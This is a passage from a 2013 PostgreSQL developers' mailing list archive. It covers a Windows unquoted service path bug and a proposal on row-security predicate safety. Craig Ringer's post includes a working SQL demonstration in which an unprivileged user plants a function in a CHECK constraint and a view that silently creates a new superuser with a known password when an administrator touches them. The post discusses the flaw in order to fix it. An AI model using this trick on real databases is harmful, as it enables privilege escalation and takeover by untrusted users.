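rte = addRangeTableEntryForRelation(pstate, rel,
                                    NULL,     /* no alias */
                                    false,    /* not inh */
                                    true);    /* inFromCl */

free_parsestate(pstate);
```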

regards, tom lane




Re: [HACKERS] PostgreSQL Service on Windows does not start. ~ is not a valid Win32 application

2013-11-10 Thread Naoya Anzai
Hi Amit,

 I have uploaded your patch for next commit fest, hope you can support
 it if there is any feedback for your patch by reviewer/committer.
Thanks! Okay, I will support you.

Best Regards,
Naoya

 Hi Naoya,
 
 On Thu, Oct 31, 2013 at 5:42 PM, Robert Haas robertmh...@gmail.com wrote:
  On Thu, Oct 31, 2013 at 1:44 AM, Asif Naeem anaeem...@gmail.com wrote:
  On Thu, Oct 31, 2013 at 10:17 AM, Amit Kapila amit.kapil...@gmail.com
  wrote:
 
  On Tue, Oct 29, 2013 at 12:46 PM, Naoya Anzai
  anzai-na...@mxu.nes.nec.co.jp wrote:
   Hi Sandeep
  
   I think, you should change the subject line  to Unquoted service path
   containing space is vulnerable and can be exploited on Windows to get 
   the
   attention..  :)
   Thank you for advice!
   I'll try to post to pgsql-bugs again.
 
  I could also reproduce this issue. The situation is very rare: an exe
  whose name matches the first part of the directory path must exist in
  the installation path.
 
 
  If one of the committers who is knowledgeable about Windows has time
  to apply this *before* the next CommitFest, that's obviously great.
  But the purpose of adding a link to the next CommitFest is to provide
  a backstop, so that we're not relying solely on someone to notice this
  email thread and pick it up, but instead have the patch as part of a
  list of patches needing review.
 
 I have uploaded your patch for next commit fest, hope you can support
 it if there is any feedback for your patch by reviewer/committer.
 
 With Regards,
 Amit Kapila.
 EnterpriseDB: http://www.enterprisedb.com
 
 
 

Regards,

Naoya

---
Naoya Anzai
Engineering Department
NEC Soft, Ltd.
E-Mail: anzai-na...@mxu.nes.nec.co.jp
---






[HACKERS] Exempting superuser from row-security isn't enough. Run predicates as DEFINER?

2013-11-10 Thread Craig Ringer
Hi all

I'm thinking about a possible solution for one of the row-security
issues - the ability of a malicious user to write a row-security policy
containing a malicious predicate function, then trick another user into
SELECTing from the table and running the function.

What about running the row-security predicate subquery as the predicate
definer - the user who SET the predicate - or the owner of the object
the predicate applies to? How expensive are security context and user id
changes - and is it even practical to do this within the context of a
security barrier subquery?

Oracle and Teradata get around this by making the assignment of row
security constraints a highly privileged operation - table owners can't
set their own. That's the other option IMO.

We already have this as a known issue with VIEWs, CHECK
constraints, etc, as shown below - so I'm tempted to
hand-wave around it as a separate issue, and just say that you shouldn't
access objects created by untrusted users.

The problem is that CHECK constraints, VIEW access, etc. don't affect
pg_dump: it won't run view predicates or check constraint code. By
contrast, pg_dump *does* read tables, so it needs to be exempted from
row-security predicates defined by untrusted users. An exemption option
is needed for performance anyway.

Protecting pg_dump and the superuser alone aren't good enough, though.
SuperSecretUser shouldn't have to fear SELECTing from a view written by
user NewThisWeek.

On a side note, pg_restore and psql running dump scripts *do* execute
such code during restores, which is kind of nasty.

Here's a demo showing how to create a new superuser with a known
password as a regular unprivileged user if you can trick the superuser
into looking at one of your objects:


CREATE USER user1;

SET SESSION AUTHORIZATION user1;

CREATE OR REPLACE FUNCTION haha() RETURNS boolean AS $$
BEGIN
RAISE NOTICE 'haha running as: %',current_user;
CREATE USER haha PASSWORD 'haha' SUPERUSER;
RETURN true;
END;
$$ LANGUAGE plpgsql;

CREATE TABLE check_exploit ( a integer check (haha()) );

CREATE VIEW view_exploit AS SELECT * FROM check_exploit WHERE haha();

GRANT ALL ON check_exploit TO postgres;
GRANT ALL ON view_exploit TO postgres;

-- later, superuser comes along and looks at the table/view:
SET SESSION AUTHORIZATION postgres;


regress=# select * from view_exploit;
NOTICE:  haha running as: postgres
 a
---
 1
(1 row)

regress=# \du haha
           List of roles
 Role name | Attributes | Member of
-----------+------------+-----------
 haha      | Superuser  | {}

regress=# DROP USER haha;



Or, if for some admin reason the superuser adds or modifies a row in the table:

regress=# INSERT INTO check_exploit VALUES (100);
NOTICE:  haha running as: postgres
INSERT 0 1


This even works with SECURITY BARRIER views, since they do nothing to
control the user ID the view predicate runs as.

If the superuser dumps this database then restores the schema and data
as two separate passes, haha will run via the check constraint in that
case too. Ouch.


So, we've got a few options:

* Run the RS constraint subqueries as DEFINER or table owner (if
possible and performant)

* Restrict the ability to set RS predicates to superuser by default, and
create a right to allow it to be delegated.

* Call it a separate problem and deal with it later, since similar
issues already apply to VIEW, CHECK, etc. Document that running pg_dump
as a user without RS exemption rights can run untrusted code written by
other users.
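The first option can be approximated today with SECURITY DEFINER: wrapping
the predicate in such a function pins the user ID it executes as to the
function's owner rather than the querying user. A sketch (rs_pred and the
row_owner column are hypothetical):

```sql
-- Hypothetical row-security predicate: runs with the privileges of its
-- owner, not of whoever SELECTs from the protected table, so a malicious
-- body can no longer hijack the querying user's rights
CREATE FUNCTION rs_pred(row_owner name) RETURNS boolean
    LANGUAGE sql STABLE SECURITY DEFINER
    AS $$ SELECT row_owner = session_user $$;
```

The open question above still applies: whether the equivalent user-ID
switch is cheap enough to do per-query inside a security barrier subquery.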

-- 
 Craig Ringer   http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training & Services

